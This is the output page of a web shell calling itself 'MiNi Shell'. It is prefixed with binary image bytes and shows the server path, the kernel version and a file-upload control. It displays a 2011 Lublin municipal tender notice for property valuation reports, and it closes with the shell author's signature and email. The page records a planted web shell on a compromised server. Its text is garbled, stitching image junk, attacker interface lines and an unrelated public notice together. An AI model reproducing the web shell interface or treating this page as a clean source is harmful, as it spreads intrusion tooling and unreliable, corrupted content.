JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110420/120693-N-2011.html

<p class="kh_header"><b>Lublin: Wykonanie 75 operatów szacunkowych - V części</b><br>
<b>Numer ogłoszenia: 120693 - 2011; data zamieszczenia: 20.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Lublin , Pl. Łokietka 1, 20-950 Lublin, woj. lubelskie, tel. 081 4663000, faks 081 4663001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie 75 operatów szacunkowych - V części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje: 
1. Część I wykonanie 54 operatów szacunkowych wycen nieruchomości stanowiących własność Skarbu Państwa przeznaczonych do aktualizacji opłat rocznych z tytułu użytkowania wieczystego położonych w Lublinie:
- dz. nr 10/42 o pow. 0,0136 ha położona przy ul. L.Herc 28c (obręb 19, ark. 4)
- dz. nr 2/77 o pow. 0,6265 ha położona przy ul. Nowy Świat 23b, 23c (obręb 10, arkusz 5),
- dz. nr 8/15 o pow. 0,0419 ha położona przy ul. Dulęby 16 (obręb 16, arkusz 4),
- dz. nr 8/5 o pow. 0,0370 ha położona przy ul. Dulęby 14 (obręb 16, arkusz 4),
- dz. nr 8/20 o pow. 0,0552 ha położona przy ul. Dulęby 8 (obręb 16, arkusz 4),
- dz. nr 3/7 o pow. 0,1093 ha położona przy ul. Spadochroniarzy 4 (obręb 26, arkusz 6),
- dz. nr 3/12 o pow. 0,1317 ha położona przy Al. Racławickich 34 (obręb 26, arkusz 6)
- dz. nr 3/13 o pow. 0,0371 ha położona przy ul. Weteranów 19 (obręb 26, arkusz 6),
- dz. nr 23/1 o pow. 0,0646 ha położona przy Al. Racławickich 18 (obręb 26, arkusz 7),
- dz. nr 3/8 o pow. 0,0365 ha położona przy Al. Racławickich 30 (obręb 26, arkusz 6),
- dz. nr 9 o pow. 0,0995 ha położona przy ul. Skłodowskiej 56 (obręb 41, arkusz 4),
- dz. nr 27/1 o pow. 0,0207 ha położona przy ul. Obrońców Pokoju 17 (obręb 41, arkusz 4),
- dz. nr 4/1 o pow. 0,0995 ha położona przy ul. Radziszewskiego 2 (obręb 41, arkusz 3)
- dz. nr 8 o pow. 0,0035 ha położona przy ul. Radzyńskiej 16a (obręb 5, arkusz 3)
- dz. nr 12 o pow. 0,0037 ha położona przy ul. Radzyńskiej 12 (obręb 5, arkusz 3)
- dz. nr 13 o pow. 0,0024 ha położona przy ul. Paganiniego 19 (obręb 5, arkusz 3)
- dz. nr 16 o pow. 0,0026 ha położona przy ul. Radzyńskiej 6 (obręb 5, arkusz 3)
- dz. nr 21 o pow. 0,0025 ha położona przy ul. Lipińskiego 9a 9 (obręb 5, arkusz 3)
- dz. nr 24 o pow. 0,0025 ha położona przy ul. Paganiniego 2a (obręb 5, arkusz 3)
- dz. br 25 o pow. 0,0025 ha położona przy ul. Paganiniego 7 (obręb 5, arkusz 3)
- dz. nr 6/24 o pow. 0,0157 ha położona przy ul. Budowlanej 3a (obręb 43, arkusz 16)
- dz. nr 30/1 o pow. 0,0402 ha położona przy ul. Harnasie (obręb 6, arkusz 1)
- dz. nr 4 o pow. 0,0048 ha położona przy ul. Legendy (obręb 6, arkusz 9)
- dz. nr 10 o pow. 0,0028 ha położona przy ul. Koncertowej 3a (obręb 6, arkusz 9)
- dz. nr 7 o pow. 0,0032 ha położona przy ul. Smyczkowej (obręb 6, arkusz 9)
- dz. nr 19/1 o pow. 0,9248 ha położona przy ul. koncertowej 29 (obręb 4, arkusz 5)
- dz. nr 39/1 o pow. 0,0280 ha położona przy ul. M.C. Skłodowskiej 36 (obręb 41, arkusz 3)
- dz. nr 3/10 o pow. 0,8843 ha położona przy ul. Włościańskiej 1,3 i Krochmalnej 13a 
                             (obręb 17, arkusz 4) 
- dz. nr nr 1/43 i 1/45 o łącznej pow. 0,3792 ha położona przy ul. Nowy Świat- 
                            droga dojazdowa (obręb 10, arkusz 1)
- dz. nr 1/60 o pow. 0,0068 ha położona przy ul. Zimnej 3b (obręb 37, arkusz 3)
- dz. nr 11 o pow. 0,1027 ha położona przy ul. Podzamcze 5 (obręb 14, arkusz 11)
- dz. nr  12 o pow. 0,3160 ha położona przy ul. Niecałej 12 (obręb 36, arkusz 2)
- dz. nr 6 o pow. 0,0894 ha położona przy ul. Niecałej 16 (obręb 36, arkusz 2)
- dz. nr 4/34 o pow. 0,7634 ha położona przy ul. Chodźki 3,5 (obręb 18, arkusz 11)
- dz. nr 45/5 o pow. 0,1787 ha położona przy ul. Krochmalnej 9a (obręb 22, arkusz 7)
- dz. nr 45/4 o pow. 0,1638 ha położona przy ul. krochmalnej 9a (obręb 22, arkusz 7)
- dz. nr 45/8 o pow. 0,2797 ha położona przy ul. krochmalnej 7,9 (obręb 22, arkusz 7)
- dz. nr 34/17 o pow.0,0614 ha położona przy ul. Filaretów 17 (obręb 28, arkusz 2)
- dz. nr 2/9 o pow. 0,0056 ha położona przy ul. Sławinkowskiej (obręb 31, arkusz 8)
- dz. nr 1/4 o pow. 0,1759 ha położona przy ul. Głębokiej 29 (obręb 29, arkusz 3)
- dz. nr 156/13 o pow. 0,1062 ha położona przy ul. Muzycznej 3a (obręb 29, arkusz 5)
- dz. nr nr 22/20 i 51/11 o łącznej pow. 0,0108 ha położone przy ul. Wyżynnej 39 
                                (obręb 27, arkusz 4)
- dz. nr 40 o pow. 0,0071 ha położona przy ul. Wyżynnej 14 (obręb 27, arkusz 4)
- dz. nr 78 o pow. 0,0043 ha położona przy ul. Na Stoku 4 (obręb 27, arkusz 4)
- dz. nr10 o pow. 0,0027 ha położona przy ul. Szmaragdowej 28 (obręb 27, arkusz 3)
- dz. nr 98 o pow. 0,0046 ha położona przy ul. Bursztynowej 24a (obręb 27, arkusz 3) 
- dz. nr 12 o pow. 0,0027 ha położona przy ul. Szmaragdowej 38 (obręb 27, arkusz 3) 
- dz. nr 21 o pow. 0,0027 ha położona przy ul. Szmaragdowej 2 (obręb 27, arkusz 3) 
- dz. nr 96 o pow. 0,0024 ha położona przy ul. Bursztynowej 32a (obręb 27, arkusz 3) 
- dz. nr 8/3 o pow. 0,0027 ha położona przy ul. Szmaragdowej 44a (obręb 27, arkusz 3) 
- dz. nr 76 o pow. 0,0066 ha położona przy ul. Wyżynnej 19a (obręb 27, arkusz 4)
- dz. nr 46/1 o pow. 0,0086 ha położona przy ul. Wyżynnej 43 b (obręb 27, arkusz 4) 
- dz. nr 55/3 o pow. 0,0209 ha położona przy ul. Wyżynnej 55 (obręb 27, arkusz 4) 
- dz. nr 30/5 o pow. 0,0090 ha położona przy ul. Turniowej 4 (obręb 27, arkusz 4) 

2. Część II wykonanie 1 operatu szacunkowego wyceny nieruchomości stanowiącej własność Skarbu Państwa przeznaczonej do ustalenia opłat z tytułu użytkowania wieczystego położonej w Lublinie:
          - dz. nr 28/3 o pow. 0,0692 ha, położona przy ul. Krzemionki 12  (obręb 2, arkusz 4)

3. Część III wykonanie 5 operatów szacunkowych wycen nieruchomości stanowiącej własność Skarbu Państwa przeznaczonych do ustalenia opłat z tytułu trwałego zarządu, położonych w Lublinie:
      - dz. nr 12/9 o pow. 0,0701 ha i dz. nr 12/11 o pow. 0,0007 ha, położone przy
         ul. Narutowicza 73 (obręb 29, arkusz 3) - wartość działek gruntu bez zabudowań,
     - dz. nr 49/6 o pow. 0,5570 ha, położona w Lublinie przy ul. Wolińskiego 4 (obręb                 43, arkusz 25)- wartość działki gruntu bez zabudowań,
     - dz. nr 16 o pow. 0,1975 ha, położona przy ul. Boczna Lubomelskiej 13 (obręb41,                    arkusz 1) wraz z wyceną budynku posadowionego na działce,
     - dz. nr 10/10 o pow. 0,3397 ha położona przy ul. Zana 38C (obręb 10, arkusz 10)-          wartość działki gruntu bez zabudowań,
  - dz. nr nr 19/10, 19/11 i 20/5 o łącznej pow. 0,2102 ha położone przy 
         ul. Narutowicza 56b,56 (obręb 34, arkusz 7) - wartość działek gruntu bez          zabudowań.

4. Część IV wykonanie 6 operatów szacunkowych wycen nieruchomości stanowiącej własność Skarbu Państwa przeznaczonej do przeniesienia własności w trybie art. 209a ustawy z dnia 21 sierpnia 1997 roku o gospodarce nieruchomościami (t.j. Dz.U. z 2010r., Nr 102, poz. 651 ze zm.) oraz art. 32a ustawy o własności lokali, położonych w Lublinie:
  - dz. nr 1/8 o pow. 0,1178 ha położona przy ul. Lipińskiego 27 (obręb 5, arkusz 3)
  - dz. nr 18/1 o pow. 0,3142 ha położona przy ul. Lipińskiego 5 (obręb 5, arkusz 3)
  - dz. nr 20/3 o pow. 0,2662 ha położona przy ul. Lipińskiego 13 (obręb 5, arkusz 3)
  - dz. nr 20/4 o pow. 0,2589 ha położona przy ul. Lipińskiego 11 (obręb 5, arkusz 3)
  - dz. nr 4/2 o pow. 0,1368 ha położona przy ul. Radzyńskiej 22 (obręb 5, arkusz 3)
  - dz. nr 28/2 o pow. 0,3766 ha położona przy ul. Różanej 5 (obręb 30, arkusz 3)

5 Część V wykonanie 9 operatów szacunkowych wycen nieruchomości stanowiących wartość Skarbu Państwa przeznaczonych do sprzedaży na rzecz użytkowników wieczystych, położonych w Lublinie:
      - dz. nr 16/1 o pow. 0,0960 ha położona przy ul. Działkowej 49 (obręb 37, arkusz 12),
      - dz. nr 4 o pow. 0,1638 ha położona przy ul. Leszetyckiego 8 (obręb 6, arkusz 5).  
      - dz. nr 154/9 o pow. 0,1817 ha położona przy ul. Szklanej 18 (obręb 2, arkusz 5) 
      - dz. nr 10/12, 10/15, 10/16, 10/17, 10/28 i 10/29 o łącznej pow. 0,4952 ha 
      położone przy Al. Witosa 22a, 22b, 22, 24 i w pobl. Al. Witosa (obręb 19, arkusz 4) 
- dz. nr 49/1 o pow. 1,7057 ha położona przy ul. K. Olszewskiego 18 (obręb 43,                      arkusz 12) 
- dz. nr 23/5 o pow. 0,4998 ha położona przy ul. Pancerniaków 1a (obręb 19, arkusz 4)
- dz. nr 2/3 o pow. 0,0384 ha położona przy ul. K. Namysłowskiego 69 
          (obręb 21, arkusz 2)  
- dz. nr 39 o pow. 0,0583 ha położona przy ul. Staszica 14a (obręb 36, arkusz 2) 
- dz. nr 65/12 o pow. 0,1266 ha położona przy ul. Inżynierskiej 8ł (obręb 43, arkusz 5).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.31.90.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez wykonawców.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 2.Oświadczenie o części zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom. 3.Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej). 4.Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania wykonawcy zgodnie z odpisem z Krajowego Rejestru Sądowego lub wykonawca - w przypadku osób fizycznych. 5. Wykonawca w sytuacji, gdy polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 6.Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III. 4.3., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy:
1) zmiana kwoty podatku VAT oraz wynagrodzenia brutto 
2) zmiana terminu realizacji przedmiotu zamówienia, w przypadku działania siły wyższej, uniemożliwiającej wykonie umowy w określonym pierwotnie terminie,
3) zmiana terminu realizacji przedmiotu zamówienia w przypadku braku dostępu do nieruchomości podlegającej wycenie. 
2. Zmiany umowy przewidziane w pkt. 1 dopuszczalne są na następujących warunkach:
- ad pkt 1) - kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę stawki podatku VAT,
- ad pkt 2) - zmiana terminu realizacji przedmiotu zamówienia - o okres działania siły wyższej oraz potrzeby usunięcia skutków tego działania,
ad pkt 3) - zmiana terminu realizacji przedmiotu zamówienia - o okres braku dostępu do nieruchomości podlegającej wycenie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych UM Lublin, Plac Litewski 1, pokój nr 3, po dokonaniu wpłaty 5,00 zł w budynku UM przy ul. Wieniawskiej 14 lub za zaliczeniem pocztowym (5,00 zł+ koszt wysyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2011 godzina 10:30, miejsce: Biuro Zamówień Publicznych Urzędu Miasta Lublin, Plac Litewski 1, 20-080 Lublin, pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami upoważnionymi do kontaktowania się z wykonawcami są:
1.W zakresie przedmiotu zamówienia: 
-  p. Michał Judziński - Wydział Gospodarowania Mieniem Urzędu Miasta Lublin, ul. Wieniawska 14 p. 712, telefon (081) 466-27-20,
- p. Monika Różycka - Pitucha - Wydział Gospodarowania Mieniem Urzędu Miasta Lublin, ul. Wieniawska 14 p. 711, telefon (081) 466-27-11.
2.W zakresie procedury: p. Radosław Antoń - Biuro Zamówień Publicznych Urzędu Miasta  Lublin, Plac Litewski 1, pokój nr 3, telefon (081) 466-30-11.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com